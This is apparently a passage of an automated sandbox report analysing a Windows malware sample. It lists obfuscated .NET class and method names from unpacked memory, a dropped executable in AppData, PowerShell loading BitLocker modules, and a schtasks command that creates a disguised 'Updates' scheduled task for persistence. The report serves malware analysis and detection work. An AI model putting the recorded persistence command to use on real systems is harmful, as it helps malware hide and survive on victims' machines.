                        Source: LisectAVT_2403002A_16.exeStatic PE information: section name: .text entropy: 7.613224313381159
                        Source: NxmtwwVGOtEdjd.exe.0.drStatic PE information: section name: .text entropy: 7.613224313381159
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, j9YWqGoNkeAufjqtfr.csHigh entropy of concatenated method names: 'SwVBC7ZCD1', 'jhUBUErGuT', 'bffBomOKCf', 'W4uBflm9Px', 'UEjBMaa25b', 'MPCBNmn75V', 'Ig1B9KdYih', 'OsrBLCjqaJ', 'wsXBRXOfsc', 'FleBgTAvaX'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.csHigh entropy of concatenated method names: 'G9ndk8TnsG', 'jg3dZIJEHi', 'LjBdVa96e6', 'njPd8sy7Bo', 'kxQda3li6Z', 'ktdd2esIcl', 'JrRdebPBPP', 'a9edxPJqAd', 'Pfjd1MdnoS', 'CxUdIT8csT'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, WEkvyEiPg4exp1JWJr.csHigh entropy of concatenated method names: 'PZc8DdvK17', 'l9p87q38HQ', 'j5W8ExCVDC', 'gV68igLBCF', 'KsN8BH6Ooe', 'NcJ8QB2txh', 'iyL8s6pMM1', 'qVj8cTJkLf', 'g8086nvp58', 'krU8GwMf5Z'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, rbl15J4iXuiF3yd9Pd.csHigh entropy of concatenated method names: 'jOI63gVPXi', 'n296d5fH6H', 'Ul06rRK1yH', 'CMM6ZfhKG5', 'X5f6VZ7J6u', 'RES6aFvqWa', 'YxO621gL0n', 'evMcn1TQak', 'AhgcAtQIsF', 'WfYc5Ak4NU'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, Icw0P7E5I25dt8WiCY.csHigh entropy of concatenated method names: 'Gk3Vojd3xF', 'UpXVfsYioH', 'W48VHS9vLY', 'H5RVj2QvDd', 'rsNVSgaler', 'bw3VuusPrG', 'xqWVn6ipha', 'C8kVAN9vCL', 'ehcV5kxvk1', 'QXSV4KGidN'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, XwoIjq3XxNvPNWGVI52.csHigh entropy of concatenated method names: 'S9I6quAppn', 'JlE6PcGTqv', 'SpB60KOY5L', 'qjP6DTT0Do', 'xvT6FBq7tV', 'vsK67TUO69', 'KE46ykTPUU', 'xK26Ei4Otb', 'Jov6irQGiN', 'Aal6mlCDlR'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, OPdVgnRx7UCY8cpdFo.csHigh entropy of concatenated method names: 'TfZ2HWlAL0', 'CDH2jiyDlM', 'PsY2SKfM56', 'ToString', 'nRi2uMGmfV', 'mGS2ns9kQw', 'VW1wfe4cQXhE4QS8t0q', 'gIuVL14qtxlhqLcSKme', 'V9HCGv4MNGDARBt7yYF'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, iKYG0MmubIw9OVMBtg.csHigh entropy of concatenated method names: 'NfWaFrMeCy', 'ocvayym4Vb', 'Qxt8NPGEbw', 'bge89L9aFL', 'FrV8L75enC', 'nCK8RO97jH', 'y8H8gXfMji', 'cgq8l6SElR', 'KXV8wZV4Ij', 'J1J8CpPc5G'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, BAqoVNzExaAeveETi0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nGt6KZD8kW', 'B2m6Bd1g5G', 'x5b6QwrK0C', 'l186sOqVHA', 'KWC6c28yta', 'S1x660KrN3', 'qx36G2ePrT'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, owyQps3JsOel92LKCfT.csHigh entropy of concatenated method names: 'yyPGquyU4J', 'HOBGPMb2R8', 'fbcG0exi88', 'm4Xi4D0WUGYwl2iwreo', 'PuZ1ee0GpkK7MHMmbUx', 'kDh9Ln0LiWLB6pRTekC', 'zlLPV70uhF5v6O9SMMp', 'MWOUVt0zq9CgoKTPbNF'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, lvrY9n9k7lkh9Cl70l.csHigh entropy of concatenated method names: 'dyU2vNq71H', 'bRk2qHAGtX', 'Qpn20Ie8IK', 'Dil2DQptVJ', 'y1k27iNsb5', 'imx2yTZCEx', 'CPt2ivNXMG', 'iO42m3uRWh', 'PlRYxG4EB672Ssut5jP', 's5Cqvv4dQVZ9udH5QQS'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, CrVdkuWHH6itGcKud7.csHigh entropy of concatenated method names: 'cs42ktJLwq', 'L0R2Vd9YmN', 'j2c2apgiGR', 'FVi2eCaI7X', 'F2X2x6jpsg', 'oSOaSIiBMG', 'lmtauUo0RN', 'fHFann456d', 'EG4aAj3BkZ', 'FVaa5gAE3p'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, TNI5rOjXvELxKJP6Fj.csHigh entropy of concatenated method names: 'CfksIuq50j', 'kvuspBFKxM', 'ToString', 'dR8sZa01jf', 'oBSsVBpPcp', 'EDos8Jm6MH', 'W6YsaP3s3U', 'lG5s2hT04B', 'FJ5seKuLH4', 'bJ9sxIrLJu'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, dMt11SJRe8APP9s2WL.csHigh entropy of concatenated method names: 'DfW0LGWf8', 'yl0DiW3Mk', 'XO87wDb8b', 'ljCyYh3ms', 'buqi4rcbN', 'ipvmXVMfp', 'TVQXYPh1C0sAYF3Uxd', 'UlSnaZ81YHSEFdtVni', 'pOZMDMIS6fcFdyJc9P', 'RA0cppkBm'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, QG7R5hgsvLbIepY6MR.csHigh entropy of concatenated method names: 'Qp9eZZB71w', 'sLGe8FrGFy', 'X5we2jcUuR', 'nDr24KU9Ms', 'itR2zuHXIZ', 'niXeXg3iOh', 'gk6e3O0EKL', 'iDleJWGD9X', 'OjiedqZRku', 'mGQeruVZC1'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, vVZlyfwE6D6VO1P3fu.csHigh entropy of concatenated method names: 'IS6eqWM1UO', 'aqqePdd4Ww', 'dQoe0qsNj8', 'ucbeDX7HC8', 'NcGeFZ58HE', 'SYRe7ktiZp', 'GRkey9vBMa', 'eMmeEgpjoi', 'gfueiotCx9', 'Rd3em2EVjB'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, yp7P2SryFTLLqPCLLF.csHigh entropy of concatenated method names: 'S393ecw0P7', 'YI23x5dt8W', 'EPg3I4exp1', 'cWJ3pr2KYG', 'gMB3Btg7rV', 'dku3QHH6it', 'Tga5uvB9jYMQHAFdI2', 'YHSRAKNCSCobJVmv0l', 'K1c331286p', 'zrj3dLrk18'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, WTyLNRuTreLPB4U01m.csHigh entropy of concatenated method names: 'CQMsApFQ0g', 'OGIs4PsFeP', 'QdAcXpX1b3', 'fPmc3asCCe', 'haUsTyBEYH', 'Y1DsUeR6fJ', 'XpssbgB0KU', 'yOSsoK7bGf', 'MMcsfgZliF', 'dC8sH0qY0s'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, NpB9h6VafMhAx1WsJp.csHigh entropy of concatenated method names: 'Dispose', 'AJi35vDi97', 'BTHJMf9HMs', 'tAuccFwjJ9', 'IHh34UJHEi', 'Hv53zFuv68', 'ProcessDialogKey', 'niWJXfxvCg', 'V7eJ31vJQV', 'AXCJJcbl15'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ShUJHEAiMv5Fuv68Ki.csHigh entropy of concatenated method names: 'reicZxmOIa', 'mVrcVTteJu', 'qkxc8Byeb0', 'yDEca2XNs6', 'S2lc22ZKj2', 'uv5ceGNQjL', 'pwhcxLYg6y', 'VfLc1iJT7L', 'CkXcI4I5TX', 'DUdcpuyU5N'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, z2DRmH3drgXDZwPhdrF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VciGoABM39', 'wm2GfLRJ7I', 'UqgGHbEgff', 'vfPGjQqj3q', 'uVRGS29YT5', 'HeOGu5CcVi', 'C0oGnAM5Qv'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, yWjIbkbFk9uQinWgPH.csHigh entropy of concatenated method names: 'PGbKEHongF', 'qe7KiRBmqH', 'PmCKW3fLEF', 'qaFKMKqOke', 'IddK9nSrCj', 'qPnKLVpZk7', 'mk2KgF0FaP', 'TyJKlLtkL3', 'XUwKCXwIjQ', 'F3GKThIsTt'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, GfxvCg5n7e1vJQVDXC.csHigh entropy of concatenated method names: 'B66cWq08vZ', 'PjOcMQSOoJ', 'HENcNl88o6', 'bKEc9YpV10', 'lgtcoGe4TI', 'UsNcLkoHPf', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, kdFvaMFVPKs73pA7Ae.csHigh entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, DD.csHigh entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, ihWImL1h2qjtIkVYDh.csHigh entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, oImfMJtvGUo8fMQNBQ.csHigh entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, wehuuoKhMKMbnQu72K.csHigh entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, kdFvaMFVPKs73pA7Ae.csHigh entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, DD.csHigh entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, ihWImL1h2qjtIkVYDh.csHigh entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, oImfMJtvGUo8fMQNBQ.csHigh entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, wehuuoKhMKMbnQu72K.csHigh entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, j9YWqGoNkeAufjqtfr.csHigh entropy of concatenated method names: 'SwVBC7ZCD1', 'jhUBUErGuT', 'bffBomOKCf', 'W4uBflm9Px', 'UEjBMaa25b', 'MPCBNmn75V', 'Ig1B9KdYih', 'OsrBLCjqaJ', 'wsXBRXOfsc', 'FleBgTAvaX'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.csHigh entropy of concatenated method names: 'G9ndk8TnsG', 'jg3dZIJEHi', 'LjBdVa96e6', 'njPd8sy7Bo', 'kxQda3li6Z', 'ktdd2esIcl', 'JrRdebPBPP', 'a9edxPJqAd', 'Pfjd1MdnoS', 'CxUdIT8csT'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, WEkvyEiPg4exp1JWJr.csHigh entropy of concatenated method names: 'PZc8DdvK17', 'l9p87q38HQ', 'j5W8ExCVDC', 'gV68igLBCF', 'KsN8BH6Ooe', 'NcJ8QB2txh', 'iyL8s6pMM1', 'qVj8cTJkLf', 'g8086nvp58', 'krU8GwMf5Z'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, rbl15J4iXuiF3yd9Pd.csHigh entropy of concatenated method names: 'jOI63gVPXi', 'n296d5fH6H', 'Ul06rRK1yH', 'CMM6ZfhKG5', 'X5f6VZ7J6u', 'RES6aFvqWa', 'YxO621gL0n', 'evMcn1TQak', 'AhgcAtQIsF', 'WfYc5Ak4NU'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, Icw0P7E5I25dt8WiCY.csHigh entropy of concatenated method names: 'Gk3Vojd3xF', 'UpXVfsYioH', 'W48VHS9vLY', 'H5RVj2QvDd', 'rsNVSgaler', 'bw3VuusPrG', 'xqWVn6ipha', 'C8kVAN9vCL', 'ehcV5kxvk1', 'QXSV4KGidN'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, XwoIjq3XxNvPNWGVI52.csHigh entropy of concatenated method names: 'S9I6quAppn', 'JlE6PcGTqv', 'SpB60KOY5L', 'qjP6DTT0Do', 'xvT6FBq7tV', 'vsK67TUO69', 'KE46ykTPUU', 'xK26Ei4Otb', 'Jov6irQGiN', 'Aal6mlCDlR'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, OPdVgnRx7UCY8cpdFo.csHigh entropy of concatenated method names: 'TfZ2HWlAL0', 'CDH2jiyDlM', 'PsY2SKfM56', 'ToString', 'nRi2uMGmfV', 'mGS2ns9kQw', 'VW1wfe4cQXhE4QS8t0q', 'gIuVL14qtxlhqLcSKme', 'V9HCGv4MNGDARBt7yYF'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, iKYG0MmubIw9OVMBtg.csHigh entropy of concatenated method names: 'NfWaFrMeCy', 'ocvayym4Vb', 'Qxt8NPGEbw', 'bge89L9aFL', 'FrV8L75enC', 'nCK8RO97jH', 'y8H8gXfMji', 'cgq8l6SElR', 'KXV8wZV4Ij', 'J1J8CpPc5G'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, BAqoVNzExaAeveETi0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nGt6KZD8kW', 'B2m6Bd1g5G', 'x5b6QwrK0C', 'l186sOqVHA', 'KWC6c28yta', 'S1x660KrN3', 'qx36G2ePrT'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, owyQps3JsOel92LKCfT.csHigh entropy of concatenated method names: 'yyPGquyU4J', 'HOBGPMb2R8', 'fbcG0exi88', 'm4Xi4D0WUGYwl2iwreo', 'PuZ1ee0GpkK7MHMmbUx', 'kDh9Ln0LiWLB6pRTekC', 'zlLPV70uhF5v6O9SMMp', 'MWOUVt0zq9CgoKTPbNF'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, lvrY9n9k7lkh9Cl70l.csHigh entropy of concatenated method names: 'dyU2vNq71H', 'bRk2qHAGtX', 'Qpn20Ie8IK', 'Dil2DQptVJ', 'y1k27iNsb5', 'imx2yTZCEx', 'CPt2ivNXMG', 'iO42m3uRWh', 'PlRYxG4EB672Ssut5jP', 's5Cqvv4dQVZ9udH5QQS'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, CrVdkuWHH6itGcKud7.csHigh entropy of concatenated method names: 'cs42ktJLwq', 'L0R2Vd9YmN', 'j2c2apgiGR', 'FVi2eCaI7X', 'F2X2x6jpsg', 'oSOaSIiBMG', 'lmtauUo0RN', 'fHFann456d', 'EG4aAj3BkZ', 'FVaa5gAE3p'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, TNI5rOjXvELxKJP6Fj.csHigh entropy of concatenated method names: 'CfksIuq50j', 'kvuspBFKxM', 'ToString', 'dR8sZa01jf', 'oBSsVBpPcp', 'EDos8Jm6MH', 'W6YsaP3s3U', 'lG5s2hT04B', 'FJ5seKuLH4', 'bJ9sxIrLJu'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, dMt11SJRe8APP9s2WL.csHigh entropy of concatenated method names: 'DfW0LGWf8', 'yl0DiW3Mk', 'XO87wDb8b', 'ljCyYh3ms', 'buqi4rcbN', 'ipvmXVMfp', 'TVQXYPh1C0sAYF3Uxd', 'UlSnaZ81YHSEFdtVni', 'pOZMDMIS6fcFdyJc9P', 'RA0cppkBm'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, QG7R5hgsvLbIepY6MR.csHigh entropy of concatenated method names: 'Qp9eZZB71w', 'sLGe8FrGFy', 'X5we2jcUuR', 'nDr24KU9Ms', 'itR2zuHXIZ', 'niXeXg3iOh', 'gk6e3O0EKL', 'iDleJWGD9X', 'OjiedqZRku', 'mGQeruVZC1'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, vVZlyfwE6D6VO1P3fu.csHigh entropy of concatenated method names: 'IS6eqWM1UO', 'aqqePdd4Ww', 'dQoe0qsNj8', 'ucbeDX7HC8', 'NcGeFZ58HE', 'SYRe7ktiZp', 'GRkey9vBMa', 'eMmeEgpjoi', 'gfueiotCx9', 'Rd3em2EVjB'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, yp7P2SryFTLLqPCLLF.csHigh entropy of concatenated method names: 'S393ecw0P7', 'YI23x5dt8W', 'EPg3I4exp1', 'cWJ3pr2KYG', 'gMB3Btg7rV', 'dku3QHH6it', 'Tga5uvB9jYMQHAFdI2', 'YHSRAKNCSCobJVmv0l', 'K1c331286p', 'zrj3dLrk18'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, WTyLNRuTreLPB4U01m.csHigh entropy of concatenated method names: 'CQMsApFQ0g', 'OGIs4PsFeP', 'QdAcXpX1b3', 'fPmc3asCCe', 'haUsTyBEYH', 'Y1DsUeR6fJ', 'XpssbgB0KU', 'yOSsoK7bGf', 'MMcsfgZliF', 'dC8sH0qY0s'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, NpB9h6VafMhAx1WsJp.csHigh entropy of concatenated method names: 'Dispose', 'AJi35vDi97', 'BTHJMf9HMs', 'tAuccFwjJ9', 'IHh34UJHEi', 'Hv53zFuv68', 'ProcessDialogKey', 'niWJXfxvCg', 'V7eJ31vJQV', 'AXCJJcbl15'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ShUJHEAiMv5Fuv68Ki.csHigh entropy of concatenated method names: 'reicZxmOIa', 'mVrcVTteJu', 'qkxc8Byeb0', 'yDEca2XNs6', 'S2lc22ZKj2', 'uv5ceGNQjL', 'pwhcxLYg6y', 'VfLc1iJT7L', 'CkXcI4I5TX', 'DUdcpuyU5N'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, z2DRmH3drgXDZwPhdrF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VciGoABM39', 'wm2GfLRJ7I', 'UqgGHbEgff', 'vfPGjQqj3q', 'uVRGS29YT5', 'HeOGu5CcVi', 'C0oGnAM5Qv'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, yWjIbkbFk9uQinWgPH.csHigh entropy of concatenated method names: 'PGbKEHongF', 'qe7KiRBmqH', 'PmCKW3fLEF', 'qaFKMKqOke', 'IddK9nSrCj', 'qPnKLVpZk7', 'mk2KgF0FaP', 'TyJKlLtkL3', 'XUwKCXwIjQ', 'F3GKThIsTt'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, GfxvCg5n7e1vJQVDXC.csHigh entropy of concatenated method names: 'B66cWq08vZ', 'PjOcMQSOoJ', 'HENcNl88o6', 'bKEc9YpV10', 'lgtcoGe4TI', 'UsNcLkoHPf', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
